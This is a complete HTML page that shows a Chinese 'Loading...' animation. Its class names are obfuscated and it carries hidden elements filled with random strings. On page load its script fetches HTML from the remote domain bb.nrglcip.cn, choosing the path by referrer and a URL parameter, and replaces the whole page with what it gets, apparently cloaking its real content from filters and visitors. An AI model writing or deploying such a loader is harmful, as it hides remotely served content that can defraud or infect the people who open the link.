<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .O3ufhrVmA5 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .O3ufhrVmA5 .jUB3six3SPr {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .O3ufhrVmA5 .content {
            line-height: 50px;
            text-align: center
        }

        .O3ufhrVmA5 .img {
            width: 100%
        }

        .O3ufhrVmA5 .RAZ98TYGy2 {
            text-align: center
        }

        .O3ufhrVmA5 .RAZ98TYGy2 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .O3ufhrVmA5 .RAZ98TYGy2 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .O3ufhrVmA5 .RAZ98TYGy2 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .O3ufhrVmA5 .RAZ98TYGy2 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .O3ufhrVmA5 .RAZ98TYGy2 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .O3ufhrVmA5 .RAZ98TYGy2 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .O3ufhrVmA5 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function q6CVdCIJf(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var JNnM6IT = q6CVdCIJf('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ JNnM6IT +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ JNnM6IT +".html?a=share";
		}
		
        SeZA0rB=url+"#"+new Date().getTime();
        SeZA0rB && function() {
            $.get(SeZA0rB, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>x3tGeUFD8675QQAgcCZrzrI3nppPQ6vkMJ6ah5fUYZNAESAWetCTSRiYYvEOouC4XFhp</span>
<p  style='display:none'>imRDsc06HVoUVFDLuaHElfHRsWluTmCtnnIKztDH0K6jtLhD2ma8</p>
<div style='display:none'>AkWDezk54CKawSOmndL0ZrQW7ghk04Xh9tIF9EVGHYIjTtsJU4bR2o9htoM5ct5mrpf9CCoMrkC9MnHcJJLKaZ</div>
<h1 style='display:none' >qCYn6roAq5N9DwRrAMplEK4CNazoYFpHTio9Z4qyl2mYIa3y</h1>
<div style='display:none'>AkWDezk54CKawSOmndL0ZrQW7ghk04Xh9tIF9EVGHYIjTtsJU4bR2o9htoM5ct5mrpf9CCoMrkC9MnHcJJLKaZ</div><div class="O3ufhrVmA5">
    <div class="jUB3six3SPr">
        <div class="RAZ98TYGy2">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<div style='display:none'>sTGtPgO5DoAj6DCev1pvgOCDwEd</div>
<a  href='#' style='display:none'>llQPTK9NQWnuTVadTxSa9jrBv0VmCOYsg</a></body>
</html>